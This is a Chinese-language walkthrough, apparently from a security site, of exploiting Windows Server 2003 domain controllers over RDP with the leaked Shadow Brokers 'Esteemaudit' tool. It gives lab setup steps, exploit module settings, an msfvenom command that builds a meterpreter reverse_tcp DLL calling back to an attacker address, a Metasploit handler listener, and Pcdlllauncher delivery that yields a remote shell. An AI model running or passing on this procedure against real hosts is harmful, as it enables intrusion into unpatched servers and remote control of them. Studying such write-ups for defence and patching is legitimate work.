http://p1.qhimg.com/t0106ab987f9f691e96.png

 


说起这个溢出是够震撼的,但是我测试的时候是有条件溢出的,就是服务器必须是域控主机,而且是和智能卡功能相关的漏洞,要不然不知道会有多少台服务器遭殃。

在我第一次测试的时候,由于没有配置域导致失败,后来在配置windows 2003 域的时候,由于各种原因,域没有配置成功,没办法往下测试,索性安装一台新的windows来测,这次就好了,成功溢出,现在分享一下过程。

第一步,在windows 2003 上安装AD活动目录。如图1,图2,图3

http://p4.qhimg.com/t0145f5d358839b4122.png

图1

http://p6.qhimg.com/t014e8874cddde481fb.png

图2

http://p9.qhimg.com/t01fb99ffa7556d3c2f.png

图3

第二步,安装IIS,.NET服务,如图4,图5

http://p2.qhimg.com/t0146aba9f80c900f12.png

图4

http://p2.qhimg.com/t015b3a43c9703d590f.png

图5

第三步,在Windows组件中安装”证书服务”,如图6,图7,图8

http://p8.qhimg.com/t0109a3a8f99114889d.png

图6

t011f0ad5532f5ecfbb.png

图7

http://p6.qhimg.com/t0165a6b86f44cc231b.png

图8

第四步,打开“证书颁发机构”,如图9,图10

http://p2.qhimg.com/t01ecbd2b9f0e8ffeaa.png

图9

http://p7.qhimg.com/t01a0504e66cca39cda.png

图10

将“注册代理”和“智能卡用户“添加至模板中。如图11,图12

http://p6.qhimg.com/t01b3f277f76a4a0ebb.png

图11

http://p8.qhimg.com/t0101e87ac6157315b7.png

图12

第五步,在” Active Directory 用户和计算机”中添加test用户,密码为www.isafe.cc, 如图13,图14,图15

http://p8.qhimg.com/t01ea3237cbbfa4e011.png

图13

http://p1.qhimg.com/t01b2a4d2e5e48396e4.png

图14

http://p9.qhimg.com/t01f9b674dd17ac1b71.png

图15

第六步,在IE里访问http://127.0.0.1/certsrv,使用域管理员账号登录  如图16

http://p5.qhimg.com/t01e3428e4682ea65f6.png

图16

依次“申请一个证书”->“高级证书申请”->“创建并向此 CA 提交一个申请”->“注册代理”->“提交”,如图17,图18,图19,图20

http://p5.qhimg.com/t013fc1b81e7f7468ea.png

图17

http://p7.qhimg.com/t01379c3037915ba3af.png

图18

http://p5.qhimg.com/t01049ca3345bc0a08e.png

图19

http://p9.qhimg.com/t017b1fd74753223d47.png

图20

依次“申请一个证书”->“高级证书申请”->“通过使用智能卡证书注册站来为另一用户申请一个 智能卡证书” ->“注册代理”->“提交”,如图21,图22,图23,图24

http://p2.qhimg.com/t01411794bbda3f1475.png

图21

http://p8.qhimg.com/t01088fdcf879490b97.png

图22

http://p1.qhimg.com/t0155bda2cf39a5a9c1.png

图23

http://p9.qhimg.com/t015c2c56d48cc72c5e.png

图24

到了这里,无法进行下去了,IE6.0有安全设置,不过不是没办法,我通过IIS里的浏览器就可以了,如图25

(提示:这里的IE6.0安全设置 可以:通过在 开始菜单-控制面板-添加或删除程序-添加/删除Windows组件 中把Internet explorer增强的安全配置取消勾选然后点击”下一步”进行删除即可)

t01194372c0d7ade1a1.png

图25

上面是域服务器配置的相关步骤,完成后,我们登录3389端口,会看到又多了一个选项,如图26,表示配置成功。

http://p6.qhimg.com/t018cd7a7b043b8daad.png

图26

现在开始步入正题,本次溢出漏洞使用的是shadowbroker提供的工具,环境方面使用

1
2
python 2.6.6
pywin32

其它没什么特别要求,运行fb.py,如图27

http://p8.qhimg.com/t01fd32d78e47e5cc99.png

图27

这里设置被攻击的服务器IP,和我的IP地址,重定向选择no,如图28

http://p8.qhimg.com/t0115a47736636b9a1d.png

图28

到了这里,我们新建一个项目,选择0,项目名称为test1,如图29

http://p2.qhimg.com/t016f7c0269e885efc3.png

图29

这是全局变量设置,下面要使用一个PoC来攻击了,执行use Esteemaudit,载入3389端口溢出模块,这个和metasploit差不多,如图30

http://p3.qhimg.com/t01d81e9e2bb5801ffa.png

图30

按照提示,Target IP为192.168.1.102 Target Port为3389,如图31

http://p8.qhimg.com/t01eaf74d6297bebc48.png

图31

保持默认并且一路回车,到这里,如图32

http://p9.qhimg.com/t01af11f55e0009402f.png

图32

输入Yes然后回车,如图33

http://p3.qhimg.com/t01505b7ab8bc062812.png

图33

输入Yes,回车,如图34

http://p3.qhimg.com/t01e3e4d2117568ae9a.png

图34

到这里大家注意把这三个dll的地址改成fb.py目录下的这个三个dll的地址,不可以用默认的地址

t01ed8ead0d47398138.png

 一路回车,到这里

http://p2.qhimg.com/t013fdd650eeab7acb1.png

RdpLibHertz这里输入71,回车继续,设置如图35,

http://p1.qhimg.com/t019e83defcdc690f59.png

图35

CallBackLocalPort设置为7980,如图36

http://p6.qhimg.com/t01d044d74713e7dbb4.png

图36

一直回车到这里

http://p6.qhimg.com/t01fd3f6d4372097a9d.png

 一直回车,到这里

http://p8.qhimg.com/t01010cb850af7bb377.png

输入Yes继续

http://p6.qhimg.com/t012171813fe28b70a9.png

可爱的Success出现了,溢出成功了。

成功溢出后,我们只是把一个后门安装在目标机上了,要shell的话,还需要metasploit的配合,使用msfvenom生成一个dll类型的Payload,命令如下:

1
msfvenom   -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -f dll   >/tmp/rdp.dll

执行后如图37,

http://p4.qhimg.com/t01b8e6995788170efd.png

图37

把生成的rdp.dll放在C盘根目录下,现在使用metasploit打开一个监听器,metasploit所在的主机IP为192.168.1.103,刚好是Payload的反弹IP,打开监听器的命令为:

1
2
3
4
5
msf   > use exploit/multi/handler
msf   exploit(handler) > set lhost 192.168.1.103
msf   exploit(handler) > set lport 4444
msf   exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf   exploit(handler) > run

如图38

http://p6.qhimg.com/t018b7607c0701f2a9c.png

图38

回到fb.py中,我们现在要把Payload发送到windows 2003服务器上去,使用Pcdlllauncher模块,如图39,图40

http://p8.qhimg.com/t013b124f36597a947e.png

图39

http://p8.qhimg.com/t01aa1956dc60228189.png

图40

LPFilename 改成实际的PC_Exploit.dll地址,不能用默认的地址

http://p5.qhimg.com/t01ccc4fac87bdb69af.png

输入Yes,一路回车,到了这里

http://p5.qhimg.com/t018ad015773c5111ef.png

输入C:\rdp.dll,回车,如图41

http://p1.qhimg.com/t01163b641bacee209e.png

图41

http://p3.qhimg.com/t0140afaca55ece2a9c.png

其它的不需要动,输入Yes后,回车,我们的shell完美的出现了,

http://p5.qhimg.com/t013a9750121da4f5dd.png

整个过程也没什么别的新意,只是windows rdp开启的不少,只要是win2003域主机,基本上是逃不过的,如今用windows 2003的人越来越少了,不过内网就不知道了。




本文由 安全客 原创发布,作者:河马安全网